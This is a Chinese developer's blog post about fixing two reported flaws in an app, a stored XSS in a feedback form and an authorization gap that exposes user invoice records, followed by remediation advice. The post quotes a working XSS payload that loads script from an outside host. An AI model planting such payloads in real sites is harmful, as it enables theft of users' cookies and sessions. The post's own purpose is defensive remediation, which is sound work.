安全路上慢慢走,持续更新

某天早上打开邮箱看到网警邮件告知”跨站脚本攻击“---XSS(存储型)

威胁描述 :跨站脚本攻击简称为 XSS 又叫 CSS (Cross Site Script
Execution),是指服务器端的 CGI 程序没有对用户提交的变量中的
HTML 代码进行有效的过滤或转换,允许攻击者往 WEB 页面里插入
对终端用户造成影响或损失的 HTML 代码。所造成的影响主要是窃
取用户登录凭证(Cookies)、挂马攻击、页面访问挟持等。

 

范围:from表单提交---APP内嵌H5页面

漏洞 URL
http://api-service.XXXXX.com/api/feedback/add?rcode=6200&time=1583133341&sign=47c8a6dd58d71c13f4529f1127ceb10f
 
输入内容,并插入 XSS 代码我就是来搞事的<sCript sRC=//xs.ax/BPVI></sCrIpT>
成功提交,还是没大佬来搞事,先不说了
 
先补锅,先补锅,先补锅:No.1不让在客户端提交此类特殊表单,但这只是拦在门外的方法;No.2接口增加验证;
 
验证修复:
1. 对用户输入的数据进行严格过滤,包括但不限于以下字符及字
符串 Javascript script src img onerror { } ( ) < > = , . ; :
"" ' # ! & / * \
2. 根据页面的输出背景环境,对输出进行编码
3. 使用一个统一的规则和库做输出编码
4. 对于富文本框,使用白名单控制输入,而不是黑名单
5. 在 Cookie 上设置 HTTPOnly 标志,从而禁止客户端脚本访问
Cookie。
 

一波未停一波又起,又来邮件emmmm--- 敏感信息泄露
 
威胁描述 :造成大量客户的个人信息泄漏
 
范围:登录用户信息,增删改其他用户记录---APP,赠票资质
 
漏洞 url:https://XX.XXXXX.cn/member/invoice
 
拦截并修改数据:查找页面元素,抓包工具拦截请求并修改,从而达到效果
 
先补锅,先补锅,先补锅:请求增加用户权限验证
 
验证修复:
1.对用户操作进行权限校验,防止通过修改参数进入未授权页面及
进行非法操作,建议在服务端对请求的数据和当前用户身份做一个
校验检查。流程描述:在服务器接收到用户发送的页面访问请求时,
根据预设的识别策略,从用户的页面访问请求中提取该用户对应的
用户唯一标识信息,同时提取所述页面访问请求对应的应答页面中
的表单及该表单中不可修改参数,将所述表单及不可修改参数与所
述用户唯一标识信息绑定后记录到参数列表中;检测到用户提交请
求页面的表单时,将所述请求页面的表单及不可修改参数与该用户
对应的所述参数列表中记录的表单及不可修改参数进行比对,控制
该用户的访问
 
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值